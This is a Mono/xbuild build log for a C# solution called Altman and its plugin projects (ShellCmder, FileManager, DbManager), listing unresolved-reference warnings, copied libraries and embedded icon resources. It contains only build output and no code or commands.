Project "/home/Altman/Source/Altman.Pex/Altman.Pex.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.ComponentModel.Composition' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.ComponentModel.Composition, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.ComponentModel.Composition, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.ComponentModel.Composition' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Altman.Pex/bin/Release/System.ComponentModel.Composition' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman.Pex/bin/Release/System.ComponentModel.Composition.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman.Pex/bin/Release/System.ComponentModel.Composition.dll' as a file, but the file does not exist
/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Altman.Pex/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman.Pex/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman.Pex/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target CopyFilesMarkedCopyLocal:
    Copying file from '/home/Altman/Libraries/Eto/Eto.dll' to '/home/Altman/Source/Altman.Pex/bin/Release/Eto.dll'
    Copying file from '/home/Altman/Libraries/IronPython/IronPython.Modules.dll' to '/home/Altman/Source/Altman.Pex/bin/Release/IronPython.Modules.dll'

Target CopyNonResxEmbeddedResources:
    Copying file from '/home/Altman/Source/Altman.Pex/lib.py' to '/home/Altman/Source/Altman.Pex/obj/Release/Altman.Pex.lib.py'

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Altman.Pex/Altman.Pex.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Altman.Pex/Altman.Pex.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.ComponentModel.Composition' not resolved

Building: Altman.Plugin (Release)

Build started 1/14/2016 8:11:32 AM.


Project "/home/Altman/Source/Altman.Plugin/Altman.Plugin.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.ComponentModel.Composition' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.ComponentModel.Composition, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.ComponentModel.Composition, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.ComponentModel.Composition' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Altman.Plugin/bin/Release/System.ComponentModel.Composition' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman.Plugin/bin/Release/System.ComponentModel.Composition.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman.Plugin/bin/Release/System.ComponentModel.Composition.dll' as a file, but the file does not exist
/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Altman.Plugin/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman.Plugin/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman.Plugin/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target CopyFilesMarkedCopyLocal:
    Copying file from '/home/Altman/Libraries/IronPython/IronPython.dll' to '/home/Altman/Source/Altman.Plugin/bin/Release/IronPython.dll'
    Copying file from '/home/Altman/Libraries/IronPython/Microsoft.Scripting.dll' to '/home/Altman/Source/Altman.Plugin/bin/Release/Microsoft.Scripting.dll'
    Copying file from '/home/Altman/Libraries/IronPython/Microsoft.Dynamic.dll' to '/home/Altman/Source/Altman.Plugin/bin/Release/Microsoft.Dynamic.dll'
    Copying file from '/home/Altman/Libraries/IronPython/Microsoft.Scripting.Metadata.dll' to '/home/Altman/Source/Altman.Plugin/bin/Release/Microsoft.Scripting.Metadata.dll'

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Altman.Plugin/Altman.Plugin.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Altman.Plugin/Altman.Plugin.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.ComponentModel.Composition' not resolved
/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Data.DataSetExtensions' not resolved

 2 Warning(s)
 0 Error(s)

Time Elapsed 00:00:00.1196670

Building: Altman (Release)

Build started 1/14/2016 8:11:33 AM.


Project "/home/Altman/Source/Altman/Altman.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.ComponentModel.Composition' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.ComponentModel.Composition, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.ComponentModel.Composition, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.ComponentModel.Composition' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Altman/bin/Release/System.ComponentModel.Composition' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman/bin/Release/System.ComponentModel.Composition.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman/bin/Release/System.ComponentModel.Composition.dll' as a file, but the file does not exist
/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Altman/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Altman/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target CopyFilesMarkedCopyLocal:
    Copying file from '/home/Altman/Libraries/Eto/Eto.dll' to '/home/Altman/Source/Altman/bin/Release/Eto.dll'

Target CopyNonResxEmbeddedResources:
    Copying file from '/home/Altman/Source/Altman/altman.ico' to '/home/Altman/Source/Altman/obj/Release/Altman.altman.ico'
    Copying file from '/home/Altman/Source/Altman/altman.png' to '/home/Altman/Source/Altman/obj/Release/Altman.altman.png'
    Copying file from '/home/Altman/Source/Altman/altman_about.png' to '/home/Altman/Source/Altman/obj/Release/Altman.altman_about.png'

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Altman/Altman.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Altman/Altman.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.ComponentModel.Composition' not resolved
/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Data.DataSetExtensions' not resolved

 2 Warning(s)
 0 Error(s)

Time Elapsed 00:00:00.1567650

Building: Plugin_ShellCmder (Release)

Build started 1/14/2016 8:11:33 AM.


Project "/home/Altman/Source/Plugin_ShellCmder/Plugin_ShellCmder.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.ComponentModel.Composition' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.ComponentModel.Composition, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.ComponentModel.Composition, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.ComponentModel.Composition' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_ShellCmder/bin/Release/System.ComponentModel.Composition' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_ShellCmder/bin/Release/System.ComponentModel.Composition.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_ShellCmder/bin/Release/System.ComponentModel.Composition.dll' as a file, but the file does not exist
/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_ShellCmder/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_ShellCmder/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_ShellCmder/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target CopyFilesMarkedCopyLocal:
    Copying file from '/home/Altman/Libraries/Eto/Eto.dll' to '/home/Altman/Source/Plugin_ShellCmder/bin/Release/Eto.dll'

Target GenerateSatelliteAssemblies:
No input files were specified for target GenerateSatelliteAssemblies, skipping.

Done building project "/home/Altman/Source/Plugin_ShellCmder/Plugin_ShellCmder.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Plugin_ShellCmder/Plugin_ShellCmder.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.ComponentModel.Composition' not resolved
/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Data.DataSetExtensions' not resolved

 2 Warning(s)
 0 Error(s)

Time Elapsed 00:00:00.2824980

Building: Plugin_FileManager (Release)

Build started 1/14/2016 8:11:33 AM.


Project "/home/Altman/Source/Plugin_FileManager/Plugin_FileManager.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.ComponentModel.Composition' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.ComponentModel.Composition, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.ComponentModel.Composition, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.ComponentModel.Composition' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_FileManager/bin/Release/System.ComponentModel.Composition' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_FileManager/bin/Release/System.ComponentModel.Composition.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_FileManager/bin/Release/System.ComponentModel.Composition.dll' as a file, but the file does not exist
/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_FileManager/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_FileManager/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_FileManager/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target CopyFilesMarkedCopyLocal:
    Copying file from '/home/Altman/Libraries/Eto/Eto.dll' to '/home/Altman/Source/Plugin_FileManager/bin/Release/Eto.dll'

Target CopyNonResxEmbeddedResources:
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/drive.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.drive.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/floder.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.floder.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/0_unknow_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.0_unknow_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/100_chm_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.100_chm_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/101_iso_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.101_iso_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/10_exe_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.10_exe_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/11_dll_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.11_dll_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/12_bat_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.12_bat_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/13_bin_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.13_bin_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/1_folder_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.1_folder_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/20_zip_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.20_zip_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/21_rar_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.21_rar_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/22_gz_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.22_gz_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/23_tgz_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.23_tgz_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/24_cab_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.24_cab_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/30_bmp_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.30_bmp_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/31_gif_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.31_gif_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/32_jpeg_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.32_jpeg_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/33_jpg_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.33_jpg_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/34_png_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.34_png_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/40_rm_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.40_rm_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/41_rmvb_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.41_rmvb_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/42_mov_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.42_mov_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/43_mp4_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.43_mp4_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/44_mpeg_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.44_mpeg_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/45_mpg_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.45_mpg_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/46_flv_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.46_flv_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/47_swf_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.47_swf_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/50_dat_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.50_dat_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/51_doc_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.51_doc_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/52_docx_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.52_docx_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/53_eml_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.53_eml_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/54_ini_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.54_ini_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/55_log_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.55_log_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/56_mdb_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.56_mdb_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/57pdf_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.57pdf_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/58_ppt_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.58_ppt_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/59_pptx_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.59_pptx_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/60_psd_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.60_psd_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/61_rtf_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.61_rtf_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/62_txt_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.62_txt_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/63_wps_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.63_wps_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/64_xls_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.64_xls_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/65_xlsx_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.65_xlsx_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/80_asa_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.80_asa_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/81_asp_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.81_asp_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/82_aspx_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.82_aspx_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/83_c_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.83_c_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/84_cpp_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.84_cpp_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/85_cs.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.85_cs.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/86_h_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.86_h_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/87_htm_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.87_htm_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/88_html_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.88_html_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/89_jar_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.89_jar_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/90_php_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.90_php_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/91_ruby_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.91_ruby_32.ico'
    Copying file from '/home/Altman/Source/Plugin_FileManager/Resources/92_sln_32.ico' to '/home/Altman/Source/Plugin_FileManager/obj/Release/Plugin_FileManager.Resources.92_sln_32.ico'

Done building project "/home/Altman/Source/Plugin_FileManager/Plugin_FileManager.csproj".-- FAILED

Build FAILED.

Warnings:

/home/Altman/Source/Plugin_FileManager/Plugin_FileManager.csproj (Build) ->
/usr/lib/mono4.6/Microsoft.Common.targets (ResolveAssemblyReferences target) ->

/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.ComponentModel.Composition' not resolved
/usr/lib/mono4.6/Microsoft.Common.targets:  warning : Reference 'System.Data.DataSetExtensions' not resolved

 2 Warning(s)
 0 Error(s)

Time Elapsed 00:00:00.4268280

Building: Plugin_DbManager (Release)

Build started 1/14/2016 8:11:34 AM.


Project "/home/Altman/Source/Plugin_DbManager/Plugin_DbManager.csproj" (Build target(s)):

Target PrepareForBuild:
    Configuration: Release Platform: AnyCPU
    Created directory "bin/Release/"
    Created directory "obj/Release/"

Target ResolveAssemblyReferences:

/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.ComponentModel.Composition' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.ComponentModel.Composition, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.ComponentModel.Composition, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.ComponentModel.Composition' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_DbManager/bin/Release/System.ComponentModel.Composition' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_DbManager/bin/Release/System.ComponentModel.Composition.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_DbManager/bin/Release/System.ComponentModel.Composition.dll' as a file, but the file does not exist
/usr/lib/mono4.6/Microsoft.Common.targets: warning : Reference 'System.Data.DataSetExtensions' not resolved
For searchpath {CandidateAssemblyFiles}
Warning: {CandidateAssemblyFiles} not supported currently
For searchpath {HintPathFromItem}
HintPath attribute not found
For searchpath {TargetFrameworkDirectory}
For searchpath {PkgConfig}
Considered System.Data.DataSetExtensions, but could not find in any pkg-config files.
For searchpath {GAC}
Considered System.Data.DataSetExtensions, but could not find in the GAC.
For searchpath {RawFileName}
Considered 'System.Data.DataSetExtensions' as a file, but the file does not exist
For searchpath bin/Release/
Considered '/home/Altman/Source/Plugin_DbManager/bin/Release/System.Data.DataSetExtensions' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_DbManager/bin/Release/System.Data.DataSetExtensions.exe' as a file, but the file does not exist
Considered '/home/Altman/Source/Plugin_DbManager/bin/Release/System.Data.DataSetExtensions.dll' as a file, but the file does not exist

Target CopyFilesMarkedCopyLocal:
    Copying file from '/home/Altman/Libraries/Eto/Eto.dll' to '/home/Altman/Source/Plugin_DbManager/bin/Release/Eto.dll'

Target CopyNonResxEmbeddedResources:
    Copying file from '/home/Altman/Source/Plugin_DbManager/Resources/0.database_start.ico' to '/home/Altman/Source/Plugin_DbManager/obj/Release/Plugin_DbManager.Resources.0.database_start.ico'
    Copying file from '/home/Altman/Source/Plugin_DbManager/Resources/1.database_failed.ico' to '/home/Altman/Source/Plugin_DbManager/obj/Release/Plugin_DbManager.Resources.1.database_failed.ico'
    Copying file from '/home/Altman/Source/Plugin_DbManager/Resources/2.database.ico' to '/home/Altman/Source/Plugin_DbManager/obj/Release/Plugin_DbManager.Resources.2.database.ico'
    Copying file from '/home/Altman/Source/Plugin_DbManager/Resources/3.table.ico' to '/home/Altman/Source/Plugin_DbManager/obj/Release/Plugin_DbManager.Resources.3.table.ico'
    Copying file from '/home/Altman/Source/Plugin_DbManager/Resources/4.table_failed.ico' to '/home/Altman/Source/Plugin_DbManager/obj/Release/Plugin_DbManager.Resources.4.table_failed.ico'
    Copying file from '/home/Altman/Source/Plugin_DbManager/Resources/5.column.ico' to '/home/Altman/Source/Plugin_DbManager/obj/Release/Plugin_DbManager.Resources.5.column.ico'
    Copying file from '/home/Altman/Source/Plugin_DbManager/Resources/run_script.ico' to '/home/Altman/Source/Plugin_DbManager/obj/Release/Plugin_DbManager.Resources.run_script.ico'
